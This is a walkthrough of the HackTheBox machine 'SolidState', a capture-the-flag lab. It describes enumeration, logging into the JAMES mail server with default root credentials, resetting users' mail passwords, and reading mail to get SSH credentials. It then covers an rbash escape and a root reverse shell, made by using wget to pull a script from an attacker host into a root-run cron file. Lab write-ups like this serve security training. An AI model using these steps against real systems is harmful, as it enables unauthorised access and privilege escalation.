SolidState — HTB Walkthrough

ENUMERATION

Nmap Scan

service and version scan

fullport scan

Extra port 4555 service and version scan

HTTP 80 ENUMERATION

Nothing juicy on website to so thought of gobuster scan and wFUZZ to fuzz through directories.

Nothing important here. So let’s move on to other ports

SMTP ENUMERATION

Tried telnet commands like VRFY solidstate etc, didn’t work.

connecting through telnet gives us nothing on port 25

PORT 4555 ENUMERATION

connecting to port 4555 with username and password :root , default for JAMES server. Then I decided to reset password of user James and else’s

POP ENUMERATION 110

I tried SSH , but no we need to connect to POP server to check mails, which is right use of James Mail Server. So we first check mails for James — user.

I made use of commands from: https://book.hacktricks.xyz/pentesting/pentesting-pop

This did not work. So we will check mails for everyone

Login as each one by one

John

Mindy

two mails for Mindy. We got ssh creds for mindy

Okh so I got nothing special from mails except the SSH keys, getting back to exploitation

Username: mindy && Password: P@55W0rd1!2@

EXPLOITATION

Highly restrictive shell. I think we have to cope up with rbash escape. After enumerating a lot, I found this

Refer : https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

Ps -ef : running processes enumeration

Going to directory I see

Nothing that juicy, so lets just run first pspy to see hidden process if any

After every 4 minutes runs a tmp.py by root.Lets get a reverse shell using the same.

Reverse_shell script.

Now we will wget this script in tmp.py

Wget -O tmp.py http://10.10.14.14:8000/reverse_shell.py

Now put a netcat listener on at port 12345

ROOTED!!!